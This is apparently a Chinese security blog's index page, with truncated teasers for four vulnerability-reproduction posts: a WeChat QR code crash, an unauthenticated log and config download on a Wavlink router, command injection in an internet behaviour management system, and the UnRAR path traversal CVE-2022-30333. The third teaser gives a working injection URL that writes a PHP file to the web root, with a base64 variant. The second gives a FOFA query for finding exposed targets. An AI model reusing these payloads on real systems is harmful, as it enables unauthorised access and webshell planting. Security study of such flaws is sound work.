注：代码可能带有破坏性，仅用于学习，分析用途。微信崩溃了？微信最新版二维码Bug,不知道问题在哪里。使用下面代码，轻松帮你复现。安装qrcodepip isntall qrcode 生成代码： import qrcode from qrcode.util import QRData, MODE_NUMBER, MODE_8BIT_BYTE def nvwu_put(self, num, length): if …

漏洞说明Wavlink WN530HG4 M30HG4.V5030.191116中存在访问控制问题，未经验证的攻击者可以下载日志文件和配置数据。影响版本Wavlink WN530HG4 M30HG4.V5030.191116漏洞复现fofa:title="Wi-Fi APP Login"payload:/cgi-bin/ExportL…

某信-上网行为管理系统一句话/view/IPV6/naborTable/static_convert.php?blocks[0]=||%20echo%20%27%3C?php%20phpinfo();?%3E%27%20%3E%3E%20/var/www/html/1.php%0aBase64 版/view/IPV6/naborTable/static_convert.php?blocks[0]=||%20echo%20PD9waH…

1. 描述UnRAR二进制文件中的路径遍历漏洞（CVE-2022-30333） 在github 公布项目poc中(地址：https://github.com/TheL1ghtVn/CVE-2022-30333-PoC)，存在rar的poc。 通过winhex打开可见，一个rar中存在俩个同名为，sym的文件夹查询资料，得到构造…